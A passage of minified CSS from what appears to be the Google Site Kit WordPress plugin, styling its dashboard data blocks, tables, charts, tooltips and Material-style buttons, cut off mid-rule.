.googlesitekit-data-block__suffix{font-size:16px;font-weight:400;letter-spacing:.5px}.googlesitekit-data-block .googlesitekit-data-block__value--up,.googlesitekit-data-block .googlesitekit-data-block__suffix--up{color:var(--color-up)}.googlesitekit-data-block .googlesitekit-data-block__value--down,.googlesitekit-data-block .googlesitekit-data-block__suffix--down{color:var(--color-down)}.googlesitekit-data-block .googlesitekit-data-block__source{font-size:12px;letter-spacing:.2px;margin-top:8px}@media(min-width: 960px){.googlesitekit-data-block .googlesitekit-data-block__source{margin-top:12px}}.googlesitekit-data-block--button .googlesitekit-data-block__sparkline{margin:8px auto 0 auto}.googlesitekit-data-block--button{cursor:pointer;display:flex;flex-direction:column;height:100%;justify-content:flex-end;padding-bottom:16px;padding-top:20px;text-align:center;transition:background-color .2s ease-in-out}@media(min-width: 960px){.googlesitekit-data-block--button{padding-bottom:24px;padding-top:28px}}.googlesitekit-data-block--button::before{content:"";height:4px;left:0;opacity:0;position:absolute;right:0;top:0;transition:opacity .2s ease-in-out}.googlesitekit-data-block--selected::before{opacity:1}.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-1:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(99,128,184,.1)}.googlesitekit-data-block--button-1.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-1.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-1::before{background-color:#6380b8}.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-2:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(75,187,187,.1)}.googlesitekit-data-block--button-2.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-2.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-2::before{background-color:#4bbbbb}.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-3:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(92,146,113,.1)}.googlesitekit-data-block--button-3.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-3.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-3::before{background-color:#5c9271}.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):hover,.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):focus,.googlesitekit-data-block--button-4:not(.googlesitekit-data-block--is-gathering-data):active{background-color:rgba(110,72,171,.1)}.googlesitekit-data-block--button-4.googlesitekit-data-block--is-gathering-data::before{background-color:#999f9b}.googlesitekit-data-block--button-4.googlesitekit-data-block--is-gathering-data.googlesitekit-data-block--selected::before{opacity:.6}.googlesitekit-data-block--button-4::before{background-color:#6e48ab}.googlesitekit-plugin .googlesitekit-data-block__loading{align-items:center;display:flex;flex-direction:row}.googlesitekit-plugin .googlesitekit-data-block--is-gathering-data{cursor:auto}.googlesitekit-error-text{color:#ac4220;font-weight:500}.googlesitekit-error-retry-text{color:#ac4220;margin-left:1rem}.googlesitekit-report-error-actions{align-items:center;display:flex;flex-wrap:wrap;gap:1rem}.googlesitekit-plugin .googlesitekit-gathering-data-notice{text-transform:lowercase}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small span{font-size:12px;letter-spacing:.2px;line-height:1.33;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-default{position:relative;text-align:inherit}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-default span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-overlay{align-items:center;display:flex;height:100%;justify-content:center;left:0;position:absolute;top:0;width:100%}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-overlay span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay{align-items:center;display:flex;height:100%;justify-content:center;left:0;position:absolute;top:0;width:100%}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-small-overlay span{font-size:18px;line-height:1.33;max-width:80px;padding:0;text-align:center}.googlesitekit-plugin .googlesitekit-gathering-data-notice.googlesitekit-gathering-data-notice--has-style-large span{color:#6c726e;display:block;font-size:28px;line-height:1.286;padding:0}#wpadminbar .googlesitekit-plugin .googlesitekit-gathering-data-notice span{color:#999f9b;font-size:12px;letter-spacing:.2px;line-height:1.33;text-transform:lowercase}.googlesitekit-plugin .googlesitekit-generic-error-handler-actions{align-items:flex-start;display:flex;flex-direction:column;gap:16px;margin-block-start:16px}.googlesitekit-plugin .googlesitekit-icon-wrapper{align-items:center;display:inline-flex}.googlesitekit-logo{color:#5f6561;line-height:0}.googlesitekit-logo .googlesitekit-logo__logo-g,.googlesitekit-logo .googlesitekit-svg-logo-g{height:24px;vertical-align:middle;width:23px}@media(min-width: 600px){.googlesitekit-logo .googlesitekit-logo__logo-g,.googlesitekit-logo .googlesitekit-svg-logo-g{height:34px;width:32px}}.googlesitekit-logo .googlesitekit-logo__logo-sitekit,.googlesitekit-logo .googlesitekit-svg-logo-sitekit{fill:currentColor;height:16px;margin-left:8px;vertical-align:middle;width:61px}@media(min-width: 600px){.googlesitekit-logo .googlesitekit-logo__logo-sitekit,.googlesitekit-logo .googlesitekit-svg-logo-sitekit{height:26px;margin-left:16px;width:99px}}@media(max-width: 449px){.googlesitekit-logo .googlesitekit-logo__logo-sitekit,.googlesitekit-logo .googlesitekit-svg-logo-sitekit{display:none}}.googlesitekit-logo--mini .googlesitekit-logo__logo-g,.googlesitekit-logo--mini .googlesitekit-svg-logo-g{height:19px;width:19px}.googlesitekit-logo--mini .googlesitekit-logo__logo-sitekit,.googlesitekit-logo--mini .googlesitekit-svg-logo-sitekit{height:17px;margin-left:4px;width:78px}.googlesitekit-preview-block{display:flex;flex-direction:column}.googlesitekit-preview-block--padding{padding:16px}.googlesitekit-preview-block--padding+.googlesitekit-preview-block--padding{padding-top:0}@media(min-width: 960px){.googlesitekit-preview-block--padding{padding:24px}}.googlesitekit-preview-block__wrapper{animation:googlesitekit-pulse 1s infinite ease-in-out;animation-direction:alternate;flex:1 1 auto}@media(prefers-reduced-motion: reduce){.googlesitekit-preview-block__wrapper{animation:none;background-image:linear-gradient(150deg, rgba(0, 0, 0, 0.05), rgba(0, 0, 0, 0.15))}}.googlesitekit-preview-block__wrapper--circle{border-radius:50%}@keyframes googlesitekit-pulse{0%{background-color:#ebeef0}100%{background-color:#cbd0d3}}.googlesitekit-preview-table{width:100%}.googlesitekit-preview-table .googlesitekit-preview-table__row{margin:0 0 9px}.googlesitekit-preview-table .googlesitekit-preview-table__row:last-child{margin-bottom:0}.googlesitekit-preview-table--padding{padding:16px}.googlesitekit-preview-table--padding+.googlesitekit-preview-table--padding{padding-top:0}@media(min-width: 960px){.googlesitekit-preview-table--padding{padding:24px}}.googlesitekit-source-link{color:#6c726e;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1}.googlesitekit-source-link button{color:#108080;letter-spacing:inherit;line-height:inherit}.googlesitekit-source-link button:hover{color:#108080}.googlesitekit-table{counter-reset:table;font-size:14px;letter-spacing:.25px;padding:16px;position:relative}@media(min-width: 960px){.googlesitekit-table{padding:24px}}.googlesitekit-alltraffic-widget .googlesitekit-table,.googlesitekit-wp-dashboard .googlesitekit-table{padding:0}.googlesitekit-table .googlesitekit-table__wrapper{border-collapse:collapse;table-layout:fixed;width:100%}.googlesitekit-table .googlesitekit-table__wrapper--tabbed-layout{table-layout:auto}.googlesitekit-table .googlesitekit-table__head-row{border-bottom:1px solid #ebeef0}.googlesitekit-table .googlesitekit-table__head-item{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:700;hyphens:auto;line-height:1.25;outline:0;padding:0 4px 8px 4px;position:relative;text-align:right;-webkit-text-decoration:none;text-decoration:none;white-space:normal}@media(min-width: 600px){.googlesitekit-table .googlesitekit-table__head-item{padding:0 8px 8px 8px}}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__head-item{padding:0 12px 12px 12px}}.googlesitekit-table .googlesitekit-table__head-item:first-child{padding-left:0;text-align:left}.googlesitekit-table .googlesitekit-table__head-item:last-child{padding-right:0}.googlesitekit-widget--with-header .googlesitekit-table .googlesitekit-table__head-item{font-size:14px;line-height:1.14}.googlesitekit-table-overflow .googlesitekit-table .googlesitekit-table__head-item:last-child{padding-right:0}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__head-item[data-tooltip]::before{background:rgba(0,0,0,.7);border-radius:3px;color:#fff;content:attr(data-tooltip);display:none;font-size:12px;letter-spacing:.2px;max-width:250px;opacity:0;padding:calc(16px / 2) 24px;pointer-events:none;position:absolute;right:0;text-align:center;top:100%;transition:opacity .2s ease-in-out,visibility .2s ease-in-out;visibility:hidden}}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__head-item:first-child[data-tooltip]::before{left:0}}.googlesitekit-table .googlesitekit-table__head-item--primary{width:50%}.googlesitekit-table .googlesitekit-table__wrapper--2-col .googlesitekit-table__head-item--primary{width:75%}.googlesitekit-table .googlesitekit-table__body{color:#161b18;font-weight:400}.googlesitekit-table .googlesitekit-table__body-row{border-bottom:1px solid #ebeef0}.googlesitekit-table .googlesitekit-table__body-row--no-data td{white-space:normal}.googlesitekit-table .googlesitekit-table__body-item{padding:8px 4px;text-align:right}@media(min-width: 600px){.googlesitekit-table .googlesitekit-table__body-item{padding:8px}}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__body-item{padding:12px}}.googlesitekit-table .googlesitekit-table__body-item:first-child{padding-left:0;text-align:left}.googlesitekit-table .googlesitekit-table__body-item:last-child{padding-right:0}.googlesitekit-table .googlesitekit-table__body-item .googlesitekit-mini-chart{display:none}@media(min-width: 600px){.googlesitekit-table .googlesitekit-table__body-item .googlesitekit-mini-chart{display:block}}.googlesitekit-table-overflow .googlesitekit-table .googlesitekit-table__body-item:last-child{padding-right:0}@media(max-width: 600px){.googlesitekit-table .googlesitekit-table__body-item-content .googlesitekit-cta-link,.googlesitekit-table .googlesitekit-table__body-item-content>span{display:block;overflow:hidden;text-overflow:ellipsis}}.googlesitekit-wp-dashboard .googlesitekit-table .googlesitekit-table__body-item-link{background-image:none}.googlesitekit-table .googlesitekit-table__body-item-url{background-image:none;display:block;font-size:12px;letter-spacing:.2px;word-break:break-word}.googlesitekit-table .googlesitekit-table__body-item-chart-wrap{align-items:center;display:flex;justify-content:flex-end}.googlesitekit-table .googlesitekit-table__source{margin-top:16px}@media(min-width: 960px){.googlesitekit-table .googlesitekit-table__source{margin-top:24px}}.googlesitekit-table--with-list .googlesitekit-table__body-row{transition:background-color .2s ease-in-out}.googlesitekit-table--with-list .googlesitekit-table__body-row:last-child{border-bottom:0}.googlesitekit-table--with-list .googlesitekit-table__body-row:hover{background-color:rgba(22,27,24,.08)}.googlesitekit-table--with-list .googlesitekit-table__body-row--no-data:hover{background-color:transparent}.googlesitekit-table--with-list .googlesitekit-table__body-item:first-child .googlesitekit-table__body-item-content{margin-left:24px;position:relative}.googlesitekit-table--with-list .googlesitekit-table__body-item:first-child .googlesitekit-table__body-item-content::before{content:counter(table) ".";counter-increment:table;left:-24px;position:absolute}.googlesitekit-table--gathering-data{padding-bottom:0}.googlesitekit-table-overflow{position:relative}@media(max-width: 600px){.googlesitekit-table-overflow::after{background:linear-gradient(to right, rgba(255, 255, 255, 0) 0%, white 85%, white 100%);bottom:0;content:"";display:block;pointer-events:none;position:absolute;right:0;top:0;transition:all .2s ease-in-out;width:0}}.googlesitekit-table-overflow .googlesitekit-table-overflow__container{overflow-x:auto;white-space:nowrap}@media(min-width: 600px){.googlesitekit-table-overflow .googlesitekit-table-overflow__container{overflow-x:visible;white-space:normal}}@media(max-width: 600px){.googlesitekit-table-overflow--gradient::after{width:15%}}.googlesitekit-chart{position:relative}.googlesitekit-chart .googlesitekit-chart__source{font-size:12px;letter-spacing:.2px;margin-top:16px}.googlesitekit-chart .googlesitekit-chart__date-marker-line{border-left:1px dashed #131418;height:100%;left:0;margin-left:.5px;opacity:0;position:absolute;top:0;transition:opacity 180ms ease-in;width:0}.googlesitekit-chart .googlesitekit-chart__date-marker-tooltip{color:#108080;height:18px;left:0;opacity:0;position:absolute;top:0;transition:opacity 180ms ease-in;width:18px}.googlesitekit-chart--LineChart div.google-visualization-tooltip{height:fit-content !important;width:fit-content !important}.googlesitekit-chart--LineChart div.google-visualization-tooltip .google-visualization-tooltip-item-list{margin:.5em 0}.googlesitekit-chart--LineChart div.google-visualization-tooltip .google-visualization-tooltip-item{margin:0}.googlesitekit-chart--PieChart svg{overflow:visible !important}.googlesitekit-chart--PieChart svg>g>g{pointer-events:none}.googlesitekit-chart--PieChart svg>g:last-child>g:last-child{pointer-events:none}.googlesitekit-chart--PieChart div.google-visualization-tooltip{pointer-events:none;z-index:8}.googlesitekit-chart-loading__forced{height:100%;width:100%}#google_dashboard_widget .googlesitekit-search-console-widget{padding-top:12px}#google_dashboard_widget .googlesitekit-search-console-widget .googlesitekit-table__body-row:hover{background:transparent}#google_dashboard_widget .googlesitekit-search-console-widget .googlesitekit-cta-link{-webkit-text-decoration:none;text-decoration:none}#google_dashboard_widget .googlesitekit-unique-visitors-chart-widget{display:grid;padding-top:20px;width:100%}#google_dashboard_widget h2.hndle{line-height:1}#google_dashboard_widget .googlesitekit-wp-dashboard .googlesitekit-wp-dashboard__cta{border-bottom:1px solid #ebeef0;margin:0 -12px;padding:0 12px 12px}#google_dashboard_widget .googlesitekit-data-block .googlesitekit-data-block__datapoint,#google_dashboard_widget .googlesitekit-data-block .googlesitekit-data-block__title,#google_dashboard_widget .googlesitekit-table .googlesitekit-table__head-item{font-family:inherit}#google_dashboard_widget .googlesitekit-table .googlesitekit-table__head-item{font-size:inherit}#google_dashboard_widget .mdc-button.googlesitekit-button-icon--spinner__running svg circle{stroke:#fff}#google_dashboard_widget .mdc-button.googlesitekit-button-icon--spinner__running.googlesitekit-button-icon--spinner__before .mdc-button__label{margin-inline-start:8px}#google_dashboard_widget .mdc-button.googlesitekit-button-icon--spinner__running.googlesitekit-button-icon--spinner__after .mdc-button__label{margin-inline-end:8px}#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-wp-dashboard-stats{display:block}#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-wp-dashboard-loading{min-height:30px}#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-wp-dashboard__cta{min-height:18px}#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-wp-dashboard-loading__search_console_active_and_connected,#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-wp-dashboard-loading__can_view_analytics{min-height:95px}#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-wp-dashboard-stats__cta{min-height:300px;width:100%}#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-unique-visitors-chart-widget{min-height:320px}#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-search-console-widget{min-height:580px}@media(max-width: 599px){#google_dashboard_widget .googlesitekit-wp-dashboard-loading .googlesitekit-preview-block.googlesitekit-search-console-widget{min-height:330px}}#google_dashboard_widget .googlesitekit-wp-dashboard-analytics-activate-cta{min-height:310px}#google_dashboard_widget .googlesitekit-wp-dashboard-analytics_active_and_connected{min-height:935px}@media(max-width: 599px){#google_dashboard_widget .googlesitekit-wp-dashboard-analytics_active_and_connected{min-height:780px}}#google_dashboard_widget .googlesitekit-wp-dashboard-analytics_active_and_connected.googlesitekit-wp-dashboard-search_console_active_and_connected{min-height:650px}#google_dashboard_widget .googlesitekit-wp-dashboard-analytics_active_and_connected.googlesitekit-wp-dashboard-search_console_active_and_connected .googlesitekit-search-console-widget:not(.googlesitekit-search-console-widget--empty-data){min-height:430px}@media(max-width: 599px){#google_dashboard_widget .googlesitekit-wp-dashboard-analytics_active_and_connected.googlesitekit-wp-dashboard-search_console_active_and_connected .googlesitekit-search-console-widget:not(.googlesitekit-search-console-widget--empty-data){min-height:220px}}#google_dashboard_widget .googlesitekit-wp-dashboard-search_console_active_and_connected{min-height:125px}#google_dashboard_widget .googlesitekit-wp-dashboard-search_console_active_and_connected.googlesitekit-wp-dashboard-analytics-activate-cta{min-height:420px}#google_dashboard_widget .googlesitekit-chart div[dir]{width:100% !important}#google_dashboard_widget .googlesitekit-wp-dashboard-stats{box-sizing:border-box;display:flex;flex-wrap:wrap;justify-content:space-between}#google_dashboard_widget .googlesitekit-wp-dashboard-stats *{box-sizing:border-box}#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__data-table{align-self:stretch;width:48%}@media(min-width: 600px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__data-table{width:auto}}@media(min-width: 800px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__data-table{width:48%}}@media(min-width: 1300px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__data-table{width:auto}}#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__cta{padding-top:12px;width:100%}@media(min-width: 600px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__cta{width:50%}}@media(min-width: 800px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__cta{width:100%}}@media(min-width: 1300px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-wp-dashboard-stats__cta{width:50%}}@media(min-width: 600px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>:where(.googlesitekit-wp-dashboard-stats__cta)+.googlesitekit-wp-dashboard-stats__cta{margin-left:1px;margin-right:-1px}}@media(min-width: 1300px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats>:where(.googlesitekit-wp-dashboard-stats__cta)+.googlesitekit-wp-dashboard-stats__cta{margin-left:1px;margin-right:-1px}}#google_dashboard_widget .googlesitekit-wp-dashboard-stats :where(.googlesitekit-cta)+.googlesitekit-wp-dashboard-stats__cta{width:100%}#google_dashboard_widget .googlesitekit-wp-dashboard-stats>.googlesitekit-data-block--is-gathering-data{margin-bottom:16px}@media(min-width: 600px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats--fourup>.googlesitekit-wp-dashboard-stats__data-table{width:auto}}@media(min-width: 800px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats--fourup>.googlesitekit-wp-dashboard-stats__data-table{width:48%}}@media(min-width: 1300px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats--fourup>.googlesitekit-wp-dashboard-stats__data-table{width:auto}}@media(min-width: 1500px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats--fourup>.googlesitekit-wp-dashboard-stats__data-table{width:48%}}@media(min-width: 2200px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats--fourup>.googlesitekit-wp-dashboard-stats__data-table{width:auto}}#google_dashboard_widget .googlesitekit-wp-dashboard-stats--twoup>.googlesitekit-wp-dashboard-stats__data-table{width:48%}#google_dashboard_widget .googlesitekit-wp-dashboard-stats--twoup>.googlesitekit-wp-dashboard-stats__cta{width:100%}#google_dashboard_widget .googlesitekit-wp-dashboard-stats--twoup>.googlesitekit-wp-dashboard-stats__cta .mdc-button{-webkit-text-decoration:none;text-decoration:none}@media(min-width: 1440px){#google_dashboard_widget .googlesitekit-wp-dashboard-stats--twoup>.googlesitekit-wp-dashboard-stats__cta .googlesitekit-analytics-cta{--cta-analytics-gap: 16px;flex-direction:column}}.googlesitekit-pointer-cta--dismiss{align-items:center;background-color:#fff;border:none;border-radius:50%;display:flex;justify-content:center;position:absolute;right:10px;top:12px}.googlesitekit-pointer-cta--dismiss:hover{cursor:pointer}.googlesitekit-pointer-buttons{margin-top:55px;padding-bottom:0;padding-left:20px;padding-right:20px}.googlesitekit-email-pointer .wp-pointer-content h3::before{content:"";font-family:dashicons,sans-serif;margin-right:8px}.googlesitekit-email-pointer .wp-pointer-content h4{line-height:24px;margin-bottom:0;margin-top:16px}.googlesitekit-email-pointer .wp-pointer-content p{margin-top:0}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__chart-zero-data{align-items:center;display:flex;justify-content:center;min-height:368px}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__chart-zero-data>svg{color:#cbd0d3;height:300px;width:300px}.googlesitekit-plugin .googlesitekit-adsense-site-stats .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-analytics-site-stats .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-search-console-site-stats .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .google-visualization-tooltip,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .google-visualization-tooltip{border-color:#b8bdb9;border-radius:8px;box-shadow:none;height:auto !important;width:auto !important;z-index:8}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip{padding:0 1em}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip em{font-style:normal;font-weight:700}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip strong,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip strong{color:#000;margin:0 .25em 0 1em}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip p,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip p{font-size:14px;letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip svg,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip svg{margin-right:.25em}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip--up em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip--up em{color:#46732b}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip--down em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip--down em{color:#ac4220}.googlesitekit-plugin .googlesitekit-adsense-site-stats .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-analytics-site-stats .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-search-console-site-stats .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-unique-visitors-chart-widget .googlesitekit-visualization-tooltip-others em,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-visualization-tooltip-others em{display:none}.googlesitekit-plugin .googlesitekit-display-block{display:block}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-desktop-display-none{display:none}}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-non-desktop-display-none{display:none}}.googlesitekit-plugin .googlesitekit-font-weight-medium{font-weight:500}.googlesitekit-plugin .googlesitekit-font-weight-bold{font-weight:700 !important}.googlesitekit-plugin .googlesitekit-overflow-wrap-break-word{overflow-wrap:break-word} .mdc-button{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.875rem;line-height:2.25rem;font-weight:500;letter-spacing:.0892857143em;-webkit-text-decoration:none;text-decoration:none;text-transform:uppercase;padding:0 8px 0 8px;display:inline-flex;position:relative;align-items:center;justify-content:center;box-sizing:border-box;min-width:64px;height:36px;border:none;outline:none;line-height:inherit;-webkit-user-select:none;user-select:none;-webkit-appearance:none;overflow:hidden;vertical-align:middle;border-radius:4px}.mdc-button::-moz-focus-inner{padding:0;border:0}.mdc-button:active{outline:none}.mdc-button:hover{cursor:pointer}.mdc-button:disabled{background-color:transparent;color:rgba(0,0,0,.37);cursor:default;pointer-events:none}.mdc-button.mdc-button--dense{border-radius:4px}.mdc-button:not(:disabled){background-color:transparent}.mdc-button .mdc-button__icon{margin-left:0;margin-right:8px;display:inline-block;width:18px;height:18px;font-size:18px;vertical-align:top}[dir=rtl] .mdc-button .mdc-button__icon,.mdc-button .mdc-button__icon[dir=rtl]{margin-left:8px;margin-right:0}.mdc-button:not(:disabled){color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-button__label+.mdc-button__icon{margin-left:8px;margin-right:0}[dir=rtl] .mdc-button__label+.mdc-button__icon,.mdc-button__label+.mdc-button__icon[dir=rtl]{margin-left:0;margin-right:8px}svg.mdc-button__icon{fill:currentColor}.mdc-button--raised .mdc-button__icon,.mdc-button--unelevated .mdc-button__icon,.mdc-button--outlined .mdc-button__icon{margin-left:-4px;margin-right:8px}[dir=rtl] .mdc-button--raised .mdc-button__icon,.mdc-button--raised .mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--unelevated .mdc-button__icon,.mdc-button--unelevated .mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--outlined .mdc-button__icon,.mdc-button--outlined .mdc-button__icon[dir=rtl]{margin-left:8px;margin-right:-4px}.mdc-button--raised .mdc-button__label+.mdc-button__icon,.mdc-button--unelevated .mdc-button__label+.mdc-button__icon,.mdc-button--outlined .mdc-button__label+.mdc-button__icon{margin-left:8px;margin-right:-4px}[dir=rtl] .mdc-button--raised .mdc-button__label+.mdc-button__icon,.mdc-button--raised .mdc-button__label+.mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--unelevated .mdc-button__label+.mdc-button__icon,.mdc-button--unelevated .mdc-button__label+.mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--outlined .mdc-button__label+.mdc-button__icon,.mdc-button--outlined .mdc-button__label+.mdc-button__icon[dir=rtl]{margin-left:-4px;margin-right:8px}.mdc-button--raised,.mdc-button--unelevated{padding:0 16px 0 